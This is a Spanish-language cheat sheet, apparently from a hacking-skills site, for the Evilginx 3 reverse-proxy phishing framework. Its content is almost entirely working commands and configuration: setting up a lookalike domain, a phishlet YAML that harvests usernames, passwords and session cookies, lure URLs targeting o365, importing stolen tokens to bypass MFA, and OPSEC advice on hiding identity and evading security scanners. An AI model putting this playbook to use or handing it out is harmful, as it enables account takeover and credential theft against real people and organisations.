Ir al contenido
1337skills 1337skills - Hojas de Trucos

Comandos de Evilginx3

Evilginx 3 es un framework de ataque adversario-en-el-medio (AiTM) que actúa como proxy inverso entre la víctima y sitios web legítimos, capturando credenciales y tokens de sesión en tiempo real, incluyendo bypass de autenticación multifactor.

Instalación

# Install Go (required)
wget https://go.dev/dl/go1.22.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.22.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

# Clone and build Evilginx 3
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make

# Or install via Go
go install github.com/kgretzky/evilginx2@latest

# Run (requires root for port 443)
sudo ./evilginx -p ./phishlets

Configuración inicial

Configuración DNS

# Before running Evilginx, configure DNS records:
# 1. Register a domain (e.g., example-login.com)
# 2. Point the domain's nameservers to your Evilginx server

# Required DNS records (set at registrar or DNS provider):
# A record:  example-login.com    -> YOUR_SERVER_IP
# A record:  *.example-login.com  -> YOUR_SERVER_IP

# Evilginx will auto-provision Let's Encrypt certificates

Configuración del servidor

# In the Evilginx console:

# Set the server's external IP
config ipv4 external YOUR_SERVER_IP

# Set the phishing domain
config domain example-login.com

# Set the redirect URL (where to send non-phishing traffic)
config redirect_url https://www.wikipedia.org

# View current configuration
config

Phishlets

Listar y cargar phishlets

# List available phishlets
phishlets

# View details of a specific phishlet
phishlets get-hosts o365

# Enable a phishlet
phishlets enable o365

# Disable a phishlet
phishlets disable o365

# Set hostname for a phishlet
phishlets hostname o365 login.example-login.com

Estructura de phishlets

# Example phishlet YAML structure (simplified)
# Located in ./phishlets/example.yaml

name: 'example'
author: 'author'
min_ver: '3.0.0'

proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'example.com'
    session: true
    is_landing: true

  - phish_sub: 'api'
    orig_sub: 'api'
    domain: 'example.com'

sub_filters:
  - triggers_on: 'login.example.com'
    orig_sub: 'login'
    domain: 'example.com'
    search: 'example.com'
    replace: '{hostname}'
    mimes: ['text/html', 'application/javascript']

auth_tokens:
  - domain: '.example.com'
    keys: ['session_token', 'auth_cookie']

credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'login.example.com'
  path: '/authenticate'

Señuelos

Creación de señuelos

# Create a lure for a phishlet
lures create o365

# List all lures
lures

# Get the phishing URL for a lure
lures get-url 0

# Set a custom redirect URL after capture
lures edit 0 redirect_url https://legitimate-site.com/dashboard

# Set a custom path for the lure
lures edit 0 path /meeting-invite

# Add URL parameters
lures edit 0 params "ref=email&id=12345"

# Set a pause duration (delay before redirect)
lures edit 0 pause 2

Personalización de señuelos

# Set a custom user-agent filter
lures edit 0 ua_filter "Mozilla"

# Set referrer filter (only allow clicks from specific sources)
lures edit 0 referrer "https://outlook.office.com"

# Generate shortened/obfuscated URL
lures get-url 0

# Delete a lure
lures delete 0

Sesiones

Visualización de sesiones capturadas

# List all captured sessions
sessions

# View details of a specific session
sessions 0

# Session details include:
# - Captured username and password
# - Session cookies/tokens
# - IP address and user agent
# - Timestamp
# - Phishlet used

# Delete a session
sessions delete 0

# Delete all sessions
sessions delete all

Extracción de tokens

# View captured cookies for a session
sessions 0

# Tokens are displayed as JSON, ready to import into browser
# Use browser developer tools or a cookie editor extension to import:
# 1. Open browser DevTools > Application > Cookies
# 2. Or use "EditThisCookie" extension
# 3. Import the captured token values

Mecánica de bypass MFA

How Evilginx bypasses MFA:

1. Victim clicks phishing link
2. Evilginx proxies the real login page to the victim
3. Victim enters credentials -> captured by Evilginx
4. Evilginx forwards credentials to real site
5. Real site prompts for MFA -> proxied to victim
6. Victim completes MFA challenge (push, TOTP, etc.)
7. Real site sets authenticated session cookies
8. Evilginx captures the session cookies
9. Attacker imports session cookies -> authenticated without MFA

What this bypasses:
- SMS/voice OTP
- TOTP authenticator apps
- Push notifications (Authenticator, Duo)
- Email OTP

What this does NOT bypass:
- FIDO2/WebAuthn hardware keys (phishing-resistant)
- Client certificate authentication
- Device-bound passkeys

Configuración de proxy

# Evilginx acts as a TLS-terminating reverse proxy:
#
# Victim <-> Evilginx (your domain + cert) <-> Real Website
#
# Traffic flow:
# 1. Victim connects to login.example-login.com (your domain)
# 2. Evilginx terminates TLS with Let's Encrypt cert
# 3. Evilginx proxies request to real login.example.com
# 4. Response is modified (domain replacements) and sent to victim
# 5. Victim sees legitimate-looking page on your domain

# Configure TLS certificate behavior
config autocert true

# Blacklist mode (block bots, scanners)
blacklist unauth

# View blacklisted IPs
blacklist

Reglas de redirección

# Configure what happens to non-targeted visitors
config redirect_url https://www.wikipedia.org

# Lure-specific redirects (after credential capture)
lures edit 0 redirect_url https://real-site.com/login?error=session_expired

# The redirect URL should look legitimate:
# - Real login page with "session expired" message
# - Password reset confirmation page
# - Generic "meeting has ended" page

# Redirect on invalid path
# Non-lure URLs automatically redirect to config redirect_url

OPSEC y sigilo

# Recommended operational security practices:

# 1. Use a clean VPS with no ties to your identity
# 2. Register domain through privacy-protected registrar
# 3. Age the domain before use (domain reputation)
# 4. Use CloudFlare or similar CDN to hide server IP
# 5. Set strict user-agent filtering on lures
# 6. Monitor and rotate domains after use
# 7. Enable blacklisting of known security scanners
# 8. Set kill dates on phishing campaigns
# 9. Clean up all artifacts after engagement

# Blacklist known security crawlers
blacklist unauth

# Use a custom landing page for non-targeted traffic
config redirect_url https://www.example.com

Registro y monitoreo

# Evilginx logs all activity to the console and log files

# View real-time activity
# (visible in the Evilginx console as events happen)

# Session data is stored in:
# ./data/sessions.json

# Configuration is stored in:
# ./data/config.json

# Monitor for new captures
sessions
# Check periodically or set up alerting

Limpieza

# After an engagement, clean up thoroughly:

# Delete all sessions
sessions delete all

# Delete all lures
lures delete all

# Disable all phishlets
phishlets disable o365

# Remove the domain configuration
# Decommission the server
# Revoke Let's Encrypt certificates